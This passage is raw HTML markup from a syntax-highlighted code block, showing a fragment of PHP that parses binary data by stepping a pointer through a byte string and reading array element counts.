class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;ARR&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-15&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-16&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$arrayCount&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-17&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-18&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$arrayCount&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-19&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;ARR&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-20&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-21&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$arrayCount2&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-22&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-23&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;					&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: 